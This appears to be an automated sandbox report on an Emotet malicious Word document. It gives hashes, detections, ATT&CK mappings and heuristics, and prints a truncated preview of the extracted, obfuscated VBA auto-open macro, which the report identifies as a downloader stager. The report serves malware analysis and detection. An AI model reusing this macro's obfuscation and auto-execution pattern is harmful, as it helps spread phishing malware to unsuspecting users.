Emotet Office (OLE) malware analysis — malicious · 76e0810861a19814

MALICIOUS

Office (OLE)

188.2 KB Created: 2019-12-16 10:56:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: c12e6c159002534a2339ad6683f97a56 SHA-1: b5afdb654a4724e7d35fa1fe7638a4e257cb63a9 SHA-256: 76e0810861a19814f0d6d89258f6332249f6b9737cd92809fee36ee4e4ea3da5

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7458509-0, indicating it is likely part of the Emotet family. Critical heuristics indicate the presence of a VBA UserForm hidden-property command stager designed for auto-execution via the Document_open macro, which uses CreateObject and GetObject calls. This suggests the macro's primary function is to download and execute a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7458509-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7458509-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8224 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8224 bytes
SHA-256: `103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Wpcelcnm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox" Private Sub Document_open() Dim Vkfpqytfyyrsu Dim Yybnowzai For Sjfskvhxnyrhb = Csdnbnzqmoun To 0 Wfmshbyurpprl = xPI Jwsugkzgnwkwn = CDbl(3) Qacpaunqp = Tan(MyeW5A) Ondvdvurouoh = 4 - Wyzwxelkjyp Cbwfcynvldrtp = (3 - Vnbtyadvousr) Eegnysps = Iqtkvhchcp Wvqwyghlkherh = CDbl(6) Fqjgdypkih = Tan(Hrkpsphikxbui) Next Dim Epygvdyqpas Dim Viklcxhl For Fquwlfizdcy = Csdnbnzqmoun To 0 Lvmvamrvwabr = xPI Hynceiatpbhn = CDbl(3) Bpzcxnzqq = Tan(MyeW5A) Yetiqsebm = 4 - Patpurfk Bkthbzuwtqi = (3 - Gdhlzjclzfaz) Ithkfntxuz = Tkesksdfnlm Bmbcesicq = CDbl(6) Mgczbijh = Tan(Prhhvivtuw) Next Dim Bntqswtftvfud Dim Nndktfjbfq For Vzovyivelg = Csdnbnzqmoun To 0 Jkbpjpgo = xPI Dtbvfsslna = CDbl(3) Ygfzgmiozg = Tan(MyeW5A) Bjdtspkkwlvut = 4 - Dlzsplwm Jiugyjwuct = (3 - Ytxpipmklgd) Daniofxik = Qexczzrjh Fuacgakydfk = CDbl(6) Jimnoyfolqzes = Tan(Lotcpqvsil) Next Sjjfkjzcfls End Sub Attribute VB_Name = "Xrfpydxbfk" Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ueqdsoufggvs" Function Elbvfewbxtip() Dim Yzdqenohomavo Dim Iepyxmulumis For Vmzarkiv = Csdnbnzqmoun To 0 Chihsaonym = xPI Zqkjenjdvuce = CDbl(3) Bvxvmmwc = Tan(MyeW5A) Ensuyvuajdm = 4 - Hgumfqhfens Qcahvxuueruo = (3 - Abupnrep) Zrlojazaveer = Ipovcpzy Hdjyfgoanih = CDbl(6) Gkesutavic = Tan(Xdjnzsbqv) Next Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza Dim Ojhymdixps Dim Gnuzzpljoe For Cvjxaxnniyya = Csdnbnzqmoun To 0 Cwgszqfzzrfq = xPI Fjyjypwru = CDbl(3) Semeiotwhmodv = Tan(MyeW5A) Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc Wrqgcedcuvbt = (3 - Vefjaqilblizy) Gepfowrrswkz = Paahiroq Vmlqfxcg = CDbl(6) Orlozcdnmm = Tan(Xklkhspqfqw) Next Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre Dim Yuagbzltvajh Dim Mizowiiepx For Eaxdnthdtkig = Csdnbnzqmoun To 0 Dkvfcheqzvadx = xPI Tfcliulwrn = CDbl(3) Cqczsqxf = Tan(MyeW5A) Junoobcdjv = 4 - Zeguoeroesmh Wvhnzolkwixug = (3 - Oduniqxtybto) Qhgmoegww = Ioixwuyhuposu Ybjlgadgfa = CDbl(6) Rfnsgzozc = Tan(Bhvgnobpmtfgf) Next Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp Dim Ixpjzknxpm Dim Zohlddmlvy For Gzgosznz = Csdnbnzqmoun To 0 Yfphqoydhiaq = xPI Bdwikvqkeocae = CDbl(3) Pzdrfqbww = Tan(MyeW5A) Mrqlapghnoceo = 4 - Nbaeqkzy Xzmizhavmj = (3 - Sontwmrnupvc) Vrwnntyccquzn = Icmetimr Mgenidkfami = CDbl(6) Vfvqlwzwzkklm = Tan(Jqjazzamtounj) Next Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena Dim Xrhcbprq Dim Jyfsevqpi For Utljxmnqhmqx = Csdnbnzqmoun To 0 Noeuarvois = xPI Hhhyvdtjdxwse = CDbl(3) Alssbwgqg = Tan(MyeW5A) Iiyfktbzffij = 4 - Dzipslqxmud Gbaqblbvlkxmc = (3 - Xzrbbfxwx) Adkwdcutuyf = Xqrspldqu Mcboujecpnlxk = CDbl(6) ... (truncated)

SHA-256: 103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Wpcelcnm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Vkfpqytfyyrsu
      Dim Yybnowzai
      For Sjfskvhxnyrhb = Csdnbnzqmoun To 0
         Wfmshbyurpprl = xPI
         Jwsugkzgnwkwn = CDbl(3)
         Qacpaunqp = Tan(MyeW5A)
         Ondvdvurouoh = 4 - Wyzwxelkjyp
         Cbwfcynvldrtp = (3 - Vnbtyadvousr)
         Eegnysps = Iqtkvhchcp
         Wvqwyghlkherh = CDbl(6)
         Fqjgdypkih = Tan(Hrkpsphikxbui)
      Next
      Dim Epygvdyqpas
      Dim Viklcxhl
      For Fquwlfizdcy = Csdnbnzqmoun To 0
         Lvmvamrvwabr = xPI
         Hynceiatpbhn = CDbl(3)
         Bpzcxnzqq = Tan(MyeW5A)
         Yetiqsebm = 4 - Patpurfk
         Bkthbzuwtqi = (3 - Gdhlzjclzfaz)
         Ithkfntxuz = Tkesksdfnlm
         Bmbcesicq = CDbl(6)
         Mgczbijh = Tan(Prhhvivtuw)
      Next
      Dim Bntqswtftvfud
      Dim Nndktfjbfq
      For Vzovyivelg = Csdnbnzqmoun To 0
         Jkbpjpgo = xPI
         Dtbvfsslna = CDbl(3)
         Ygfzgmiozg = Tan(MyeW5A)
         Bjdtspkkwlvut = 4 - Dlzsplwm
         Jiugyjwuct = (3 - Ytxpipmklgd)
         Daniofxik = Qexczzrjh
         Fuacgakydfk = CDbl(6)
         Jimnoyfolqzes = Tan(Lotcpqvsil)
      Next
Sjjfkjzcfls
End Sub

Attribute VB_Name = "Xrfpydxbfk"
Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ueqdsoufggvs"
Function Elbvfewbxtip()
      Dim Yzdqenohomavo
      Dim Iepyxmulumis
      For Vmzarkiv = Csdnbnzqmoun To 0
         Chihsaonym = xPI
         Zqkjenjdvuce = CDbl(3)
         Bvxvmmwc = Tan(MyeW5A)
         Ensuyvuajdm = 4 - Hgumfqhfens
         Qcahvxuueruo = (3 - Abupnrep)
         Zrlojazaveer = Ipovcpzy
         Hdjyfgoanih = CDbl(6)
         Gkesutavic = Tan(Xdjnzsbqv)
      Next
Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza
      Dim Ojhymdixps
      Dim Gnuzzpljoe
      For Cvjxaxnniyya = Csdnbnzqmoun To 0
         Cwgszqfzzrfq = xPI
         Fjyjypwru = CDbl(3)
         Semeiotwhmodv = Tan(MyeW5A)
         Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc
         Wrqgcedcuvbt = (3 - Vefjaqilblizy)
         Gepfowrrswkz = Paahiroq
         Vmlqfxcg = CDbl(6)
         Orlozcdnmm = Tan(Xklkhspqfqw)
      Next
Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre
      Dim Yuagbzltvajh
      Dim Mizowiiepx
      For Eaxdnthdtkig = Csdnbnzqmoun To 0
         Dkvfcheqzvadx = xPI
         Tfcliulwrn = CDbl(3)
         Cqczsqxf = Tan(MyeW5A)
         Junoobcdjv = 4 - Zeguoeroesmh
         Wvhnzolkwixug = (3 - Oduniqxtybto)
         Qhgmoegww = Ioixwuyhuposu
         Ybjlgadgfa = CDbl(6)
         Rfnsgzozc = Tan(Bhvgnobpmtfgf)
      Next
Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp
      Dim Ixpjzknxpm
      Dim Zohlddmlvy
      For Gzgosznz = Csdnbnzqmoun To 0
         Yfphqoydhiaq = xPI
         Bdwikvqkeocae = CDbl(3)
         Pzdrfqbww = Tan(MyeW5A)
         Mrqlapghnoceo = 4 - Nbaeqkzy
         Xzmizhavmj = (3 - Sontwmrnupvc)
         Vrwnntyccquzn = Icmetimr
         Mgenidkfami = CDbl(6)
         Vfvqlwzwzkklm = Tan(Jqjazzamtounj)
      Next
Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena
      Dim Xrhcbprq
      Dim Jyfsevqpi
      For Utljxmnqhmqx = Csdnbnzqmoun To 0
         Noeuarvois = xPI
         Hhhyvdtjdxwse = CDbl(3)
         Alssbwgqg = Tan(MyeW5A)
         Iiyfktbzffij = 4 - Dzipslqxmud
         Gbaqblbvlkxmc = (3 - Xzrbbfxwx)
         Adkwdcutuyf = Xqrspldqu
         Mcboujecpnlxk = CDbl(6)
        
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.